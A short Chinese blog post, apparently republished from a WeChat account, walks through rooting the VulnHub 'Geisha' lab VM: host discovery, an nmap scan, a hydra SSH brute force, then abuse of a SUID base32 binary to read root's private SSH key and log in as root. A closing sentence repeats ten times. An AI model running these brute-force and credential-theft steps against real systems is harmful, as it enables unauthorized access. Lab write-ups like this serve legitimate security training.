今天实践的是vulnhub的Geisha镜像,
下载地址,https://download.vulnhub.com/geisha/Geisha.zip,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.177.0/24,
获取到靶机地址192.168.177.149,
继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.149,
获取到用户名信息geisha,进行ssh暴力破解,
hydra -l geisha -P /usr/share/wordlists/rockyou.txt 192.168.177.149 ssh,
获取到用户密码geisha/letmein,ssh登录,
ssh [email protected],
查找root权限的程序,find / -perm -u=s -type f 2>/dev/null,
获取到base32,对root的ssh登录密钥进行解码,
base32 "/root/.ssh/id_rsa" | base32 --decode,
保存到kali攻击机本地,vim key,修改权限,chmod 600 key,
重新ssh登录,ssh -i key [email protected],确认是root,
本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Geisha的实践
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论